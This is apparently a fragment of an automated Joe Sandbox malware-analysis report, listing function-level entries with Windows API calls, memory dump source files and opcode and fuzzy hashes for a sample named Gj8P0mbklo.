• Instruction Fuzzy Hash: B7D23A72E086299FDF66CE28CD407EAB7B9EB45305F1541EAD40DE7240E778AE818F41
Uniqueness

Uniqueness Score: -1.00%

APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 0036453A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: Concurrency::cancel_current_task
• String ID: Te9$parse error$parse_error
• API String ID: 118556049-3911243356
• Opcode ID: cd491d59a42ad7085ded0d9962ea3466c12634c51bf9f925a583e7c6ee705a6a
• Instruction ID: bf8c078a37e4d4eb794dc7884e02d694831f2710fe498cf62e4381bfc5a4259d
• Opcode Fuzzy Hash: cd491d59a42ad7085ded0d9962ea3466c12634c51bf9f925a583e7c6ee705a6a
• Instruction Fuzzy Hash: 75E1D271E102098FCB0ADFA8CC95BEDBBB5BF55300F14866DE406EB655EB34AA44CB50
Uniqueness

Uniqueness Score: -1.00%

APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 0036453A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: Concurrency::cancel_current_task
• String ID: '$Te9$parse error$parse_error
• API String ID: 118556049-3974104043
• Opcode ID: c30190316d3d1cf5bbb6468100f6d8439fcee8189602978484b9f1cdb8250b04
• Instruction ID: 8077d3c17264f319d2d17430ae5cb7a4718654ec15d783c5f8d1d41248147fac
• Opcode Fuzzy Hash: c30190316d3d1cf5bbb6468100f6d8439fcee8189602978484b9f1cdb8250b04
• Instruction Fuzzy Hash: BFD10271D102088FDB0ADFA4CC95BEDBBB5FF15300F14866DE406AB696EB349A84CB50
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocaleInfoW.KERNEL32(00000000,2000000B,0038D73B,00000002,00000000,?,?,?,0038D73B,?,00000000), ref: 0038D4C2
• GetLocaleInfoW.KERNEL32(00000000,20001004,0038D73B,00000002,00000000,?,?,?,0038D73B,?,00000000), ref: 0038D4EB
• GetACP.KERNEL32(?,?,0038D73B,?,00000000), ref: 0038D500
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: 644296267cd01ca5c47327e0ef595ccc6e004346d5dc08771a6ddc55750a1e4e
• Instruction ID: c74b9c4c11c3abd8040658105d682d79cf888bfc62646be8eed6e750aec1c238
• Opcode Fuzzy Hash: 644296267cd01ca5c47327e0ef595ccc6e004346d5dc08771a6ddc55750a1e4e
• Instruction Fuzzy Hash: 0E21B672600304ABDB33FF16D902AA773AAEB50B64B5784E4E90AD7195EB32ED41C350
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
  • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
• GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0038D70D
• IsValidCodePage.KERNEL32(00000000), ref: 0038D74B
• IsValidLocale.KERNEL32(?,00000001), ref: 0038D75E
• GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0038D7A6
• GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0038D7C1
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
• String ID:
• API String ID: 415426439-0
• Opcode ID: 7aa7716298b577e2e602a53ad403f8d7254866cfacd38d864839d08b27cb1382
• Instruction ID: 86f688963be221b8ac216958bd9dbf6d49ed4898748856e69e0c8324fc5e2fab
• Opcode Fuzzy Hash: 7aa7716298b577e2e602a53ad403f8d7254866cfacd38d864839d08b27cb1382
• Instruction Fuzzy Hash: B8516C71A00309ABDF12FFA5DC45AAA77B8AF08700F5545AAF914EB191E770D904CB61
Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
                                                                                                                                                                                              • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
                                                                                                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,00382EB1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0038CD38
                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00382EB1,?,?,?,00000055,?,-00000050,?,?), ref: 0038CD6F
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0038CED4
                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ErrorLast$CodeInfoLocalePageValid
• String ID: utf8
• API String ID: 607553120-905460609
• Opcode ID: 97cd6fe6e3940835a09c951c63a5ed3e479d2e3fdf65f2113ac0b5e497619a6a
• Instruction ID: a73cc2c9e6d16c8a4fe92d911ce5947d588b738fa93f36e76736ef606ab0a75a
• Opcode Fuzzy Hash: 97cd6fe6e3940835a09c951c63a5ed3e479d2e3fdf65f2113ac0b5e497619a6a
• Instruction Fuzzy Hash: 1A71F571620306AADB27BB35CC42EB7B7A8EF05700F1154AAF506DB182EB70E9448771
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0037536F
• IsDebuggerPresent.KERNEL32 ref: 0037543B
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0037545B
• UnhandledExceptionFilter.KERNEL32(?), ref: 00375465
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 221485d903ef85c7460ca69f1be02310db1b41876c8639bdffe670fd721fb88b
• Instruction ID: c6e38105391923a556cee51604d24a95867057b4ebb56833a1ce9825d0c96522
• Opcode Fuzzy Hash: 221485d903ef85c7460ca69f1be02310db1b41876c8639bdffe670fd721fb88b
• Instruction Fuzzy Hash: 0C312BB5D0531C9BDB21DFA4D98A7CCBBB8AF04305F1041DAE40DAB250EB755A84CF44
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
  • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0038D0F4
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0038D13E
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0038D204
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: InfoLocale$ErrorLast
• String ID:
• API String ID: 661929714-0
• Opcode ID: 05d9674c30013848ede2897331945cc1c5c947a902fba3f941836671de3d928a
• Instruction ID: 58d8433c373571b252fe355e4d12a48336ed16ef5f1006fb66a82ded28912cdf
• Opcode Fuzzy Hash: 05d9674c30013848ede2897331945cc1c5c947a902fba3f941836671de3d928a
• Instruction Fuzzy Hash: 8E616D7150030B9FDB6AEF24CC86BAAB7A8EF04300F1545AAED05DA9C9E774D985CB50
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00380EC4
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00380ECE
• UnhandledExceptionFilter.KERNEL32(0037A655,?,?,?,?,?,00000000), ref: 00380EDB
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 2f21faa6e9af2090dacbd0ddeb2782a362a769f543cefde7241d15338cb82a0e
• Instruction ID: 53005a647f0c0ceb384bd2a86bd6c5539f67ae9d8e967f368a7aaff5033b1c56
• Opcode Fuzzy Hash: 2f21faa6e9af2090dacbd0ddeb2782a362a769f543cefde7241d15338cb82a0e
• Instruction Fuzzy Hash: 653106749413189BCB62DF24DD89B8DBBB8BF08310F1042DAE41CA7250EB749F858F44
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemTimePreciseAsFileTime.KERNEL32(?,?,003758C4,0036F818,?,?,?,0036F818), ref: 0037613E
• GetSystemTimeAsFileTime.KERNEL32(0036F818,?,?,003758C4,0036F818,?,?,?,0036F818), ref: 00376142
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: Time$FileSystem$Precise
• String ID:
• API String ID: 743729956-0
• Opcode ID: 02c9b172606be1a8943cbaf732e0eb6a9b306b612f10698f8c852df91d5ea675
• Instruction ID: 6684e6301a3bf363818b9afcda49485ad23318dc98ff217ce94a287f93d8d9bd
• Opcode Fuzzy Hash: 02c9b172606be1a8943cbaf732e0eb6a9b306b612f10698f8c852df91d5ea675
• Instruction Fuzzy Hash: 68D02236502538978E132B84EC1B4DD7F1CEA44F62B000013F90D83221CB625C80CBD0
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
                                                                                                                                                                                            • String ID: `':$null
                                                                                                                                                                                            • API String ID: 0-721221276
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 003683C5
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• API String ID: 118556049-0
Uniqueness
Uniqueness Score: -1.00%
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 00368765
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• API String ID: 118556049-0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0038E9E2,?,?,00000008,?,?,003938D0,00000000), ref: 0038EC14
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: caaddf8c86fc02356a774ac707d45eac55274ee795d676ab57b9b59f23525b65
• Instruction ID: 3a131b6097e81f7467339a362b47a1ab2dd7d9286b6e7330f58fa64d911bf166
• Instruction Fuzzy Hash: 63B12C71510709DFD71ADF28C48AB657BE0FF45364F2A8698E89ACF2A1C335E991CB40
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: 6db7c73ce08339aaa5700da7917c8cc34e2840ebc5b127ec01b7b7fc58230247
• Instruction ID: 5aed134f91d1e3e1c72e1938d8d52c2be215dd8c062b0bbca5d85b26f547d4b9
• Instruction Fuzzy Hash: C802AF76D00118AFDF19DFA4DC819FEBBB5EF88314F0A8169F805BB252D6716D018BA4
Uniqueness Score: -1.00%

APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,00000000,811C9DC5,00000000), ref: 00374832
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ByteCharMultiWide
• String ID:
• API String ID: 626452242-0
• Opcode ID: a2d00ad38e361adb7388db93bfd943bcf886d6dbb573726ace917efe083b9de2
• Instruction ID: cff399b332db66311a58d595eec7d43d338df291623e6bb8caaccafb357106e4
• Instruction Fuzzy Hash: 1561B4729002189BDB25DB64DC8ABDDB3B4EF49310F1482D5E60DAB291EB75AAC4CF50
Uniqueness Score: -1.00%

APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00375195
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: 809e59870bf93071235349f78b2105534dedfe1fd2e32656b3307af5c1abec9f
• Instruction ID: 139fe0e919ea99fd4adbd9497714004ad1ee97b9a218c56824ba8ad7a00d991e
• Instruction Fuzzy Hash: 1A516F71A01A058BEB2ACF65D8817AEB7F4FB49350F25C86AD409EB361D7B89940CF50
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 07aff6d1553c290a1a10a783e47b39e77437f426b1c4e66b6431f1684cfe6ffa
• Instruction ID: cbdd044f9fa9e754da5b8116dd725b8fb05e2091e16f07de44debd2e44df96ce
• Instruction Fuzzy Hash: E241A2B5805219AFDF25EF69CC89ABABBB9EF45300F1442DAE40DD7201DA359E848F10
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID: ,
• API String ID: 0-3772416878
• Opcode ID: 287914b32e3ba21ffebdad04aae9bfba9a70f6aebeb90cc0641aeed20a3bc8f5
• Instruction ID: 93b7d1d543b4b96d0332604b56f70f5d23914f88c0ed3a4e03975d94cdc47d3d
• Instruction Fuzzy Hash: 42E18131A0126A8BCB25CB68CC51BEDFB70AF15300F0442EAD959B7742D7706E98CFA1
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
  • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0038D354
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 918b332856172416d445a7dedc02d2e8459dc7a3855e9dc90a114877b31b68c5
• Instruction ID: 8cbf33359cb3e9c1e27d242edd481b630d48f5073dad86c715f9630e36120716
• Instruction Fuzzy Hash: 6321A476601306ABDB2ABB25DC82A7A73ACEF45314F1400BAFD01DA185EBB4ED44CB51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 5fb85376299f8e8f09c2a6ac544acb18208e63bedf52167a8e81a277400cdb5a
• Instruction ID: 11f8c609d5a571ec024cdee4bf6a9e49859e119fdf60a7e7f8f4e43754bdfa84
• Opcode Fuzzy Hash: 5fb85376299f8e8f09c2a6ac544acb18208e63bedf52167a8e81a277400cdb5a
• Instruction Fuzzy Hash: 8FC100309007068FCBAFEF68C49567ABBB5EF81300F250699E4969B691D331AD4DCF50
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
  • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
• EnumSystemLocalesW.KERNEL32(0038D0A0,00000001,00000000,?,-00000050,?,0038D6E1,00000000,?,?,?,00000055,?), ref: 0038CFE4
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
